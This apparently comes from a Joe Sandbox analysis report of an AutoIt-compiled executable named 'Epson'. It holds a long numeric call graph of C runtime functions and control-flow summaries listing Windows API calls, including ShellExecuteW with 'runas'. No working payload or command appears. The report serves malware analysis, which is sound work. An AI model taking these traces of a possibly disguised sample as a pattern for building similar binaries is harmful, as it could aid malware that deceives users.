104947->104928 104948->104928 104949->104928 104950->104922 104951->104909 104952->104944 104953->104879 104954->104876 104955->104884 104956->104879 104957->104879 104958->104879 104959->104879 104960->104879 104961->104879 103661 f7f06e 103662 f7f07a BuildCatchObjectHelperInternal 103661->103662 103663 f7f086 103662->103663 103664 f7f09b 103662->103664 103680 f7f649 20 API calls __dosmaperr 103663->103680 103674 f794fd EnterCriticalSection 103664->103674 103667 f7f08b 103681 f82b5c 26 API calls _strftime 103667->103681 103668 f7f0a7 103675 f7f0db 103668->103675 103673 f7f096 __wsopen_s 103674->103668 103683 f7f106 103675->103683 103677 f7f0e8 103678 f7f0b4 103677->103678 103703 f7f649 20 API calls __dosmaperr 103677->103703 103682 f7f0d1 LeaveCriticalSection __fread_nolock 103678->103682 103680->103667 103681->103673 103682->103673 103684 f7f114 103683->103684 103685 f7f12e 103683->103685 103707 f7f649 20 API calls __dosmaperr 103684->103707 103686 f7dcc5 __fread_nolock 26 API calls 103685->103686 103689 f7f137 103686->103689 103688 f7f119 103708 f82b5c 26 API calls _strftime 103688->103708 103704 f89789 103689->103704 103693 f7f1bf 103696 f7f1dc 103693->103696 103702 f7f1ee 103693->103702 103694 f7f23b 103695 f7f248 103694->103695 103694->103702 103710 f7f649 20 API calls __dosmaperr 103695->103710 103709 f7f41f 31 API calls 4 library calls 103696->103709 103699 f7f1e6 103700 f7f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103699->103700 103700->103677 103702->103700 103711 f7f29b 30 API calls 2 library calls 103702->103711 103703->103678 103712 f89606 103704->103712 103706 f7f153 103706->103693 103706->103694 103706->103700 103707->103688 103708->103700 103709->103699 103710->103700 103711->103700 103713 f89612 BuildCatchObjectHelperInternal 103712->103713 103714 f8961a 103713->103714 103715 f89632 103713->103715 103738 f7f636 20 API calls __dosmaperr 103714->103738 103716 f896e6 103715->103716 103720 f8966a 103715->103720 103743 f7f636 20 API calls __dosmaperr 103716->103743 103719 f8961f 103739 f7f649 20 API calls __dosmaperr 103719->103739 103737 f854ba EnterCriticalSection 103720->103737 103721 f896eb 103744 f7f649 20 API calls __dosmaperr 103721->103744 103725 f89627 __wsopen_s 103725->103706 103726 f89670 103728 f896a9 103726->103728 103729 f89694 103726->103729 103727 f896f3 103745 f82b5c 26 API calls _strftime 103727->103745 103732 f8970b __wsopen_s 28 API calls 103728->103732 103740 f7f649 20 API calls __dosmaperr 103729->103740 103735 f896a4 103732->103735 103733 f89699 103741 f7f636 20 API calls __dosmaperr 103733->103741 103742 f896de LeaveCriticalSection __wsopen_s 103735->103742 103737->103726 103738->103719 103739->103725 103740->103733 103741->103735 103742->103725 103743->103721 103744->103727 103745->103725 104962 f88782 104967 f8853e 104962->104967 104965 f887aa 104968 f8856f try_get_first_available_module 104967->104968 104975 f886b8 104968->104975 104982 f7917b 40 API calls 2 library calls 104968->104982 104970 f8876e 104986 f82b5c 26 API calls _strftime 104970->104986 104972 f886c3 104972->104965 104979 f90d04 104972->104979 104974 f8870c 104974->104975 104983 f7917b 40 API calls 2 library calls 104974->104983 104975->104972 104985 f7f649 20 API calls __dosmaperr 104975->104985 104977 f8872b 104977->104975 104984 f7917b 40 API calls 2 library calls 104977->104984 104987 f90401 104979->104987 104981 f90d1f 104981->104965 104982->104974 104983->104977 104984->104975 104985->104970 104986->104972 104989 f9040d BuildCatchObjectHelperInternal 104987->104989 104988 f9041b 105045 f7f649 20 API calls __dosmaperr 104988->105045 104989->104988 104991 f90454 104989->104991 104998 f909db 104991->104998 104992 f90420 105046 f82b5c 26 API calls _strftime 104992->105046 104997 f9042a __wsopen_s 104997->104981 105048 f907af 104998->105048 105001 f90a0d 105080 f7f636 20 API calls __dosmaperr 105001->105080 105002 f90a26 105066 f85594 105002->105066 105005 f90a2b 105006 f90a4b 105005->105006 105007 f90a34 105005->105007 105079 f9071a CreateFileW 105006->105079 105082 f7f636 20 API calls __dosmaperr 105007->105082 105011 f90a39 105083 f7f649 20 API calls __dosmaperr 105011->105083 105013 f90b01 GetFileType 105014 f90b0c GetLastError 105013->105014 105019 f90b53 105013->105019 105086 f7f613 20 API calls 2 library calls 105014->105086 105015 f90ad6 GetLastError 105085 f7f613 20 API calls 2 library calls 105015->105085 105016 f90a84 105016->105013 105016->105015 105084 f9071a CreateFileW 105016->105084 105088 f854dd 21 API calls 3 library calls 105019->105088 105021 f90a12 105081 f7f649 20 API calls __dosmaperr 105021->105081 105022 f90b1a CloseHandle 105022->105021 105025 f90b43 105022->105025 105024 f90ac9 105024->105013 105024->105015 105087 f7f649 20 API calls __dosmaperr 105025->105087 105026 f90b74 105028 f90bc0 105026->105028 105089 f9092b 72 API calls 4 library calls 105026->105089 105033 f90bed 105028->105033 105090 f904cd 72 API calls 4 library calls 105028->105090 105029 f90b48 105029->105021 105032 f90be6 105032->105033 105034 f90bfe 105032->105034 105091 f88a2e 105033->105091 105036 f90478 105034->105036 105037 f90c7c CloseHandle 105034->105037 105047 f904a1 LeaveCriticalSection __wsopen_s 105036->105047 105106 f9071a CreateFileW 105037->105106 105039 f90ca7 105040 f90cb1 GetLastError 105039->105040 105041 f90cdd 105039->105041 105107 f7f613 20 API calls 2 library calls 105040->105107 105041->105036 105043 f90cbd 105108 f856a6 21 API calls 3 library calls 105043->105108 105045->104992 105046->104997 105047->104997 105049 f907d0 105048->105049 105050 f907ea 105048->105050 105049->105050 105116 f7f649 20 API calls __dosmaperr 105049->105116 105109 f9073f 105050->105109 105053 f907df 105117 f82b5c 26 API calls _strftime 105053->105117 105055 f90822 105056 f90851 105055->105056 105118 f7f649 20 API calls __dosmaperr 105055->105118 105061 f908a4 105056->105061 105120 f7da7d 26 API calls 2 library calls 105056->105120 105059 f9089f 105059->105061 105062 f9091e 105059->105062 105060 f90846 105119 f82b5c 26 API calls _strftime 105060->105119 105061->105001 105061->105002 105121 f82b6c 11 API calls _abort 105062->105121 105065 f9092a 105067 f855a0 BuildCatchObjectHelperInternal 105066->105067 105124 f832d1 EnterCriticalSection 105067->105124 105070 f855cc 105128 f85373 21 API calls 3 library calls 105070->105128 105071 f855a7 105071->105070 105075 f8563a EnterCriticalSection 105071->105075 105078 f855ee 105071->105078 105072 f85617 __wsopen_s 105072->105005 105074 f855d1 105074->105078 105129 f854ba EnterCriticalSection 105074->105129 105077 f85647 LeaveCriticalSection 105075->105077 105075->105078 105077->105071 105125 f8569d 105078->105125 105079->105016 105080->105021 105081->105036 105082->105011 105083->105021 105084->105024 105085->105021 105086->105022 105087->105029 105088->105026 105089->105028 105090->105032 105092 f85737 __wsopen_s 26 API calls 105091->105092 105095 f88a3e 105092->105095 105093 f88a44 105131 f856a6 21 API calls 3 library calls 105093->105131 105095->105093 105096 f88a76 105095->105096 105098 f85737 __wsopen_s 26 API calls 105095->105098 105096->105093 105099 f85737 __wsopen_s 26 API calls 105096->105099 105097 f88a9c 105100 f88abe 105097->105100 105132 f7f613 20 API calls 2 library calls 105097->105132 105101 f88a6d 105098->105101 105102 f88a82 CloseHandle 105099->105102 105100->105036 105104 f85737 __wsopen_s 26 API calls 105101->105104 105102->105093 105105 f88a8e GetLastError 105102->105105 105104->105096 105105->105093 105106->105039 105107->105043 105108->105041 105111 f90757 105109->105111 105110 f90772 105110->105055 105111->105110 105122 f7f649 20 API calls __dosmaperr 105111->105122 105113 f90796 105123 f82b5c 26 API calls _strftime 105113->105123 105115 f907a1 105115->105055 105116->105053 105117->105050 105118->105060 105119->105056 105120->105059 105121->105065 105122->105113 105123->105115 105124->105071 105130 f83319 LeaveCriticalSection 105125->105130 105127 f856a4 105127->105072 105128->105074 105129->105078 105130->105127 105131->105097 105132->105100 103746 f7076b 103747 f70777 BuildCatchObjectHelperInternal 103746->103747 103776 f70221 103747->103776 103749 f7077e 103750 f708d1 103749->103750 103753 f707a8 103749->103753 103814 f70baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103750->103814 103752 f708d8 103815 f751c2 28 API calls _abort 103752->103815 103764 f707e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103753->103764 103787 f827ed 103753->103787 103755 f708de 103816 f75174 28 API calls _abort 103755->103816 103759 f708e6 103760 f707c7 103762 f70848 103795 f70cc9 103762->103795 103764->103762 103810 f7518a 38 API calls 3 library calls 103764->103810 103765 f7084e 103799 f5331b 103765->103799 103770 f7086a 103770->103752 103771 f7086e 103770->103771 103772 f70877 103771->103772 103812 f75165 28 API calls _abort 103771->103812 103813 f703b0 13 API calls 2 library calls 103772->103813 103775 f7087f 103775->103760 103777 f7022a 103776->103777 103817 f70a08 IsProcessorFeaturePresent 103777->103817 103779 f70236 103818 f73004 10 API calls 3 library calls 103779->103818 103781 f7023b 103782 f7023f 103781->103782 103819 f82687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103781->103819 103782->103749 103784 f70248 103785 f70256 103784->103785 103820 f7302d 8 API calls 3 library calls 103784->103820 103785->103749 103789 f82804 103787->103789 103821 f70dfc 103789->103821 103790 f707c1 103790->103760 103791 f82791 103790->103791 103792 f827c0 103791->103792 103793 f70dfc CatchGuardHandler 5 API calls 103792->103793 103794 f827e9 103793->103794 103794->103764 103829 f726b0 103795->103829 103798 f70cef 103798->103765 103800 f53327 IsThemeActive 103799->103800 103801 f53382 103799->103801 103831 f752b3 103800->103831 103811 f70d02 GetModuleHandleW 103801->103811 103803 f53352 103837 f75319 103803->103837 103805 f53359 103844 f532e6 SystemParametersInfoW SystemParametersInfoW 103805->103844 103807 f53360 103845 f5338b 103807->103845 103809 f53368 SystemParametersInfoW 103809->103801 103810->103762 103811->103770 103812->103772 103813->103775 103814->103752 103815->103755 103816->103759 103817->103779 103818->103781 103819->103784 103820->103782 103822 f70e07 IsProcessorFeaturePresent 103821->103822 103823 f70e05 103821->103823 103825 f70fce 103822->103825 103823->103790 103828 f70f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103825->103828 103827 f710b1 103827->103790 103828->103827 103830 f70cdc GetStartupInfoW 103829->103830 103830->103798 103832 f752bf BuildCatchObjectHelperInternal 103831->103832 103894 f832d1 EnterCriticalSection 103832->103894 103834 f752ca pre_c_initialization 103895 f7530a 103834->103895 103836 f752ff __wsopen_s 103836->103803 103838 f7533f 103837->103838 103839 f75325 103837->103839 103838->103805 103839->103838 103899 f7f649 20 API calls __dosmaperr 103839->103899 103841 f7532f 103900 f82b5c 26 API calls _strftime 103841->103900 103843 f7533a 103843->103805 103844->103807 103846 f5339b __wsopen_s 103845->103846 103847 f5bf73 8 API calls 103846->103847 103848 f533a7 GetCurrentDirectoryW 103847->103848 103901 f54fd9 103848->103901 103850 f533ce IsDebuggerPresent 103851 f533dc 103850->103851 103852 f93ca3 MessageBoxA 103850->103852 103853 f93cbb 103851->103853 103854 f533f0 103851->103854 103852->103853 104005 f54176 8 API calls 103853->104005 103969 f53a95 103854->103969 103861 f53462 103863 f93cec SetCurrentDirectoryW 103861->103863 103864 f5346a 103861->103864 103863->103864 103865 f53475 103864->103865 104006 fb1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103864->104006 104001 f534d3 7 API calls 103865->104001 103868 f93d07 103868->103865 103872 f93d19 103868->103872 103871 f5347f 103875 f5396b 60 API calls 103871->103875 103878 f53494 103871->103878 104007 f55594 103872->104007 103874 f93d22 103876 f5b329 8 API calls 103874->103876 103875->103878 103877 f93d30 103876->103877 103879 f93d38 103877->103879 103880 f93d5f 103877->103880 103881 f53907 Shell_NotifyIconW 103878->103881 103882 f534af 103878->103882 103883 f56b7c 8 API calls 103879->103883 103884 f56b7c 8 API calls 103880->103884 103881->103882 103885 f534b6 SetCurrentDirectoryW 103882->103885 103886 f93d43 103883->103886 103887 f93d5b GetForegroundWindow ShellExecuteW 103884->103887 103888 f534ca 103885->103888 103889 f57bb5 8 API calls 103886->103889 103892 f93d90 103887->103892 103888->103809 103891 f93d51 103889->103891 103893 f56b7c 8 API calls 103891->103893 103892->103882 103893->103887 103894->103834 103898 f83319 LeaveCriticalSection 103895->103898 103897 f75311 103897->103836 103898->103897 103899->103841 103900->103843 103902 f5bf73 8 API calls 103901->103902 103903 f54fef 103902->103903 104014 f563d7 103903->104014 103905 f5500d 103906 f5bd57 8 API calls 103905->103906 103907 f55021 103906->103907 103908 f5bed9 8 API calls 103907->103908 103909 f5502c 103908->103909 103910 f5893c 8 API calls 103909->103910 103911 f55038 103910->103911 103912 f5b329 8 API calls 103911->103912 103913 f55045 103912->103913 103914 f5be2d 39 API calls 103913->103914 103915 f55055 103914->103915 103916 f5b329 8 API calls 103915->103916 103917 f5507b 103916->103917 103918 f5be2d 39 API calls 103917->103918 103919 f5508a 103918->103919 103920 f5bf73 8 API calls 103919->103920 103921 f550a8 103920->103921 104028 f551ca 103921->104028 103924 f74d98 _strftime 40 API calls 103925 f550c2 103924->103925 103926 f550cc 103925->103926 103927 f94b23 103925->103927 103928 f74d98 _strftime 40 API calls 103926->103928 103929 f551ca 8 API calls 103927->103929 103930 f550d7 103928->103930 103931 f94b37 103929->103931 103930->103931 103932 f550e1 103930->103932 103933 f551ca 8 API calls 103931->103933 103934 f74d98 _strftime 40 API calls 103932->103934 103935 f94b53 103933->103935 103936 f550ec 103934->103936 103938 f55594 10 API calls 103935->103938 103936->103935 103937 f550f6 103936->103937 103939 f74d98 _strftime 40 API calls 103937->103939 103940 f94b76 103938->103940 103941 f55101 103939->103941 103942 f551ca 8 API calls 103940->103942 103943 f94b9f 103941->103943 103944 f5510b 103941->103944 103945 f94b82 103942->103945 103947 f551ca 8 API calls 103943->103947 103946 f5512e 103944->103946 103950 f5bed9 8 API calls 103944->103950 103949 f5bed9 8 API calls 103945->103949 103948 f94bda 103946->103948 103953 f57e12 8 API calls 103946->103953 103951 f94bbd 103947->103951 103954 f94b90 103949->103954 103955 f55121 103950->103955 103952 f5bed9 8 API calls 103951->103952 103957 f94bcb 103952->103957 103958 f5513e 103953->103958 103959 f551ca 8 API calls 103954->103959 103956 f551ca 8 API calls 103955->103956 103956->103946 103960 f551ca 8 API calls 103957->103960 103961 f58470 8 API calls 103958->103961 103959->103943 103960->103948 103962 f5514c 103961->103962 103963 f58a60 8 API calls 103962->103963 103966 f55167 103963->103966 103964 f5893c 8 API calls 103964->103966 103965 f58a60 8 API calls 103965->103966 103966->103964 103966->103965 103967 f551ab 103966->103967 103968 f551ca 8 API calls 103966->103968 103967->103850 103968->103966 103970 f53aa2 __wsopen_s 103969->103970 103971 f940da ___scrt_fastfail 103970->103971 103972 f53abb 103970->103972 103974 f940f6 GetOpenFileNameW 103971->103974 103973 f55851 9 API calls 103972->103973 103975 f53ac4 103973->103975 103976 f94145 103974->103976 104040 f53a57 103975->104040 103978 f58577 8 API calls 103976->103978 103980 f9415a 103978->103980 103980->103980 103982 f53ad9 104058 f562d5 103982->104058 104601 f53624 7 API calls 104001->104601 104003 f5347a 104004 f535b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104003->104004 104004->103871 104005->103861 104006->103868 104008 f922d0 __wsopen_s 104007->104008 104009 f555a1 GetModuleFileNameW 104008->104009 104010 f5b329 8 API calls 104009->104010 104011 f555c7 104010->104011 104012 f55851 9 API calls 104011->104012 104013 f555d1 104012->104013 104013->103874 104015 f563e4 __wsopen_s 104014->104015 104016 f58577 8 API calls 104015->104016 104017 f56416 104015->104017 104016->104017 104018 f5655e 8 API calls 104017->104018 104023 f5644c 104017->104023 104018->104017 104019 f5655e 8 API calls 104019->104023 104020 f5651a 104021 f5654f 104020->104021 104022 f5b329 8 API calls 104020->104022 104021->103905 104024 f56543 104022->104024 104023->104019 104023->104020 104025 f5b329 8 API calls 104023->104025 104034 f56a7c 104023->104034 104026 f56a7c 8 API calls 104024->104026 104025->104023 104026->104021 104029 f551d4 104028->104029 104030 f551f2 104028->104030 104032 f5bed9 8 API calls 104029->104032 104033 f550b4 104029->104033 104031 f58577 8 API calls 104030->104031 104031->104033 104032->104033 104033->103924 104035 f56aac __fread_nolock 104034->104035 104036 f56a8b 104034->104036 104037 f7014b 8 API calls 104035->104037 104039 f7017b 8 API calls 104036->104039 104038 f56abf 104037->104038 104038->104023 104039->104035 104041 f922d0 __wsopen_s 104040->104041 104042 f53a64 GetLongPathNameW 104041->104042 104043 f58577 8 API calls 104042->104043 104044 f53a8c 104043->104044 104045 f553f2 104044->104045 104046 f5bf73 8 API calls 104045->104046 104047 f55404 104046->104047 104048 f55851 9 API calls 104047->104048 104049 f5540f 104048->104049 104050 f94d5b 104049->104050 104051 f5541a 104049->104051 104056 f94d7d 104050->104056 104094 f6e36b 41 API calls 104050->104094 104052 f56a7c 8 API calls 104051->104052 104054 f55426 104052->104054 104088 f51340 104054->104088 104057 f55439 104057->103982 104095 f56679 104058->104095 104089 f51352 104088->104089 104093 f51371 __fread_nolock 104088->104093 104091 f7017b 8 API calls 104089->104091 104090 f7014b 8 API calls 104092 f51388 104090->104092 104091->104093 104092->104057 104093->104090 104094->104050 104269 f5663e LoadLibraryA 104095->104269 104100 f95648 104102 f566e7 68 API calls 104100->104102 104101 f566a4 LoadLibraryExW 104277 f56607 LoadLibraryA 104101->104277 104270 f56674 104269->104270 104271 f56656 GetProcAddress 104269->104271 104274 f7e95b 104270->104274 104272 f56666 104271->104272 104272->104270 104273 f5666d FreeLibrary 104272->104273 104273->104270 104306 f7e89a 104274->104306 104276 f56698 104276->104100 104276->104101 104278 f5661c GetProcAddress 104277->104278 104279 f5663b 104277->104279 104309 f7e8a6 BuildCatchObjectHelperInternal 104306->104309 104307 f7e8b4 104331 f7f649 20 API calls __dosmaperr 104307->104331 104309->104307 104311 f7e8e4 104309->104311 104310 f7e8b9 104332 f82b5c 26 API calls _strftime 104310->104332 104313 f7e8f6 104311->104313 104314 f7e8e9 104311->104314 104323 f883e1 104313->104323 104333 f7f649 20 API calls __dosmaperr 104314->104333 104318 f7e8c4 __wsopen_s 104318->104276 104324 f883ed BuildCatchObjectHelperInternal 104323->104324 104336 f832d1 EnterCriticalSection 104324->104336 104326 f883fb 104337 f8847b 104326->104337 104331->104310 104332->104318 104333->104318 104336->104326 104344 f8849e 104337->104344 104601->104003 105133 fa1ac5 105134 fa1acd 105133->105134 105137 f5d535 105133->105137 105164 fb7a87 8 API calls __fread_nolock 105134->105164 105136 fa1adf 105165 fb7a00 8 API calls __fread_nolock 105136->105165 105139 f7014b 8 API calls 105137->105139 105141 f5d589 105139->105141 105140 fa1b09 105142 f60340 207 API calls 105140->105142 105144 f5c32d 8 API calls 105141->105144 105143 fa1b30 105142->105143 105145 fa1b44 105143->105145 105166 fd61a2 53 API calls _wcslen 105143->105166 105147 f5d5b3 105144->105147 105148 f7014b 8 API calls 105147->105148 105156 f5d66e messages 105148->105156 105149 fa1b61 105149->105137 105167 fb7a87 8 API calls __fread_nolock 105149->105167 105151 f5c3ab 8 API calls 105161 f5d9ac messages 105151->105161 105152 f5bed9 8 API calls 105152->105156 105155 fa1f79 105169 fb56ae 8 API calls messages 105155->105169 105156->105152 105156->105155 105157 fa1f94 105156->105157 105159 f5c3ab 8 API calls 105156->105159 105160 f5d911 messages 105156->105160 105168 f5b4c8 8 API calls 105156->105168 105159->105156 105160->105151 105160->105161 105162 f5d9c3 105161->105162 105163 f6e30a 8 API calls messages 105161->105163 105163->105161 105164->105136 105165->105140 105166->105149 105167->105149 105168->105156 105169->105157 105170 f5da4a 105171 f5da54 105170->105171 105180 f5dbc4 105170->105180 105171->105180 105200 f5cf80 105171->105200 105173 f5dace 105174 f7014b 8 API calls 105173->105174 105175 f5dae7 105174->105175 105176 f7017b 8 API calls 105175->105176 105177 f5db05 105176->105177 105178 f7014b 8 API calls 105177->105178 105181 f5db16 __fread_nolock 105178->105181 105179 f7014b 8 API calls 105183 f5db7f 105179->105183 105182 f7017b 8 API calls 105180->105182 105184 f5d5e1 105180->105184 105187 f5dc19 105180->105187 105181->105179 105181->105180 105182->105180 105183->105180 105185 f5cf80 39 API calls 105183->105185 105186 f7014b 8 API calls 105184->105186 105185->105180 105188 f5d66e messages 105186->105188 105190 f5bed9 8 API calls 105188->105190 105194 fa1f79 105188->105194 105196 fa1f94 105188->105196 105197 f5c3ab 8 API calls 105188->105197 105198 f5d911 messages 105188->105198 105209 f5b4c8 8 API calls 105188->105209 105189 f5c3ab 8 API calls 105192 f5d9ac messages 105189->105192 105190->105188 105199 f5d9c3 105192->105199 105208 f6e30a 8 API calls messages 105192->105208 105210 fb56ae 8 API calls messages 105194->105210 105197->105188 105198->105189 105198->105192 105201 f5d1c7 105200->105201 105206 f5cf93 105200->105206 105201->105173 105203 f5bf73 8 API calls 105203->105206 105204 f5d03d 105204->105173 105206->105203 105206->105204 105211 f705b2 5 API calls __Init_thread_wait 105206->105211 105212 f70413 29 API calls __onexit 105206->105212 105213 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105206->105213 105208->105192 105209->105188 105210->105196 105211->105206 105212->105206 105213->105206

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 234 f55fc8-f56037 call f5bf73 GetVersionExW call f58577 239 f9507d-f95090 234->239 240 f5603d 234->240 242 f95091-f95095 239->242 241 f5603f-f56041 240->241 243 f56047-f560a6 call f5adf4 call f555dc 241->243 244 f950bc 241->244 245 f95098-f950a4 242->245 246 f95097 242->246 259 f560ac-f560ae 243->259 260 f95224-f9522b 243->260 250 f950c3-f950cf 244->250 245->242 248 f950a6-f950a8 245->248 246->245 248->241 249 f950ae-f950b5 248->249 249->239 252 f950b7 249->252 253 f5611c-f56136 GetCurrentProcess IsWow64Process 250->253 252->244 255 f56195-f5619b 253->255 256 f56138 253->256 258 f5613e-f5614a 255->258 256->258 261 f95269-f9526d GetSystemInfo 258->261 262 f56150-f5615f LoadLibraryA 258->262 263 f560b4-f560b7 259->263 264 f95125-f95138 259->264 265 f9524b-f9524e 260->265 266 f9522d 260->266 269 f56161-f5616f GetProcAddress 262->269 270 f5619d-f561a7 GetSystemInfo 262->270 263->253 271 f560b9-f560f5 263->271 273 f9513a-f95143 264->273 274 f95161-f95163 264->274 267 f95239-f95241 265->267 268 f95250-f9525f 265->268 272 f95233 266->272 267->265 268->272 277 f95261-f95267 268->277 269->270 278 f56171-f56175 GetNativeSystemInfo 269->278 279 f56177-f56179 270->279 271->253 282 f560f7-f560fa 271->282 272->267 280 f95150-f9515c 273->280 281 f95145-f9514b 273->281 275 f95198-f9519b 274->275 276 f95165-f9517a 274->276 285 f9519d-f951b8 275->285 286 f951d6-f951d9 275->286 283 f9517c-f95182 276->283 284 f95187-f95193 276->284 277->267 278->279 287 f56182-f56194 279->287 288 f5617b-f5617c FreeLibrary 279->288 280->253 281->253 289 f56100-f5610a 282->289 290 f950d4-f950e4 282->290 283->253 284->253 291 f951ba-f951c0 285->291 292 f951c5-f951d1 285->292 286->253 295 f951df-f95206 286->295 288->287 289->250 296 f56110-f56116 289->296 293 f950f7-f95101 290->293 294 f950e6-f950f2 290->294 291->253 292->253 297 f95103-f9510f 293->297 298 f95114-f95120 293->298 294->253 299 f95208-f9520e 295->299 300 f95213-f9521f 295->300 296->253 297->253 298->253 299->253 300->253
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00F55FF7
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00FEDC2C,00000000,?,?), ref: 00F56123
                                                                                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F5612A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F56155
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F56167
                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F56175
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F5617C
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00F561A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                      • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                      • Opcode ID: 3fcc15875896a11494e495bb0236e6d08cf8db0c5087ecec5066398a044d2476
                                                                                                                                                                                                                                      • Instruction ID: 3a597c1921c574490342cfaa6aa37d34f2f4f9185762a86973bca93c0fb80701
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fcc15875896a11494e495bb0236e6d08cf8db0c5087ecec5066398a044d2476
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECA1B63290A6C4CFDB32CFE874412A53F946B26B15B78C89AD5C1A721AC23F4549EB31

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F53368,?), ref: 00F533BB
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F53368,?), ref: 00F533CE
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,01022418,01022400,?,?,?,?,?,?,00F53368,?), ref: 00F5343A
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                        • Part of subcall function 00F5425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F53462,01022418,?,?,?,?,?,?,?,00F53368,?), ref: 00F542A0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,01022418,?,?,?,?,?,?,?,00F53368,?), ref: 00F534BB
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00F93CB0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,01022418,?,?,?,?,?,?,?,00F53368,?), ref: 00F93CF1
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,010131F4,01022418,?,?,?,?,?,?,?,00F53368), ref: 00F93D7A
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F93D81
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: GetSysColorBrush.USER32(0000000F), ref: 00F534DE
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: LoadCursorW.USER32(00000000,00007F00), ref: 00F534ED
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: LoadIconW.USER32(00000063), ref: 00F53503
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: LoadIconW.USER32(000000A4), ref: 00F53515
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: LoadIconW.USER32(000000A2), ref: 00F53527
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F5353F
                                                                                                                                                                                                                                        • Part of subcall function 00F534D3: RegisterClassExW.USER32(?), ref: 00F53590
                                                                                                                                                                                                                                        • Part of subcall function 00F535B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F535E1
                                                                                                                                                                                                                                        • Part of subcall function 00F535B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F53602
                                                                                                                                                                                                                                        • Part of subcall function 00F535B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F53368,?), ref: 00F53616
                                                                                                                                                                                                                                        • Part of subcall function 00F535B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F53368,?), ref: 00F5361F
                                                                                                                                                                                                                                        • Part of subcall function 00F5396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F53A3C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AutoIt, xrefs: 00F93CA5
                                                                                                                                                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00F93CAA
                                                                                                                                                                                                                                      • runas, xrefs: 00F93D75
                                                                                                                                                                                                                                      Memory Dump Source
